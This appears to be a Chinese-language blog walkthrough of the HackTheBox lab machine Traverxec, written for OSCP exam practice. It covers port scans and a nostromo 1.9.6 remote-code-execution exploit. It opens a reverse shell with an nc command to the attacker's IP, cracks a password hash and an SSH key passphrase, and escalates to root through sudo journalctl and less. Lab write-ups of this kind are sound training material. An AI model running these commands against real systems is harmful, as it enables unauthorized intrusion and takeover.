OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

Ethan医生2个月前靶场75

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)

image.png





nmap -sU --top-ports 100 10.129.21.112 (扫描UDP)

image.png


然后看扫描结果发现

nostromo 1.9.6

image.png

执行RCE

python2.7 47837.py 10.129.21.112 80 whoami

image.png


python2.7 47837.py 10.129.21.112 80 "nc 10.10.16.31 3333 -e /bin/bash"


image.png

发现目录下有密钥,

image.png


david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

使用john直接进行爆破

image.png

Nowonly4me

尝试切换看看 还是没法登入

cd nostromo/conf/nhttpd.conf

image.png


cd /home/david/public_www


image.png

image.png

有个tgz包

image.png

  1. cp backup-ssh-identity-files.tgz /tmp

  1. tar -zxvf backup-ssh-identity-files.tgz

ssh2john id-rsa > te

cat te 

image.png

john te --wordlist=/usr/share/wordlists/rockyou.txt 

image.png

hunter登入后

image.png

image.png

发现最后一行用sudo(root权限)执行了一个journalctl命令。
关于该命令的说明:journalctl 用来查询 systemd-journald 服务收集到的日志。systemd-journald 服务是 systemd init 系统提供的收集系统日志的服务。
然后执行以下命令。


  1. /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/less

然后输入!sh进入命令模式

在这里插入图片描述

标签: OSCP

相关文章

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-2,107/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。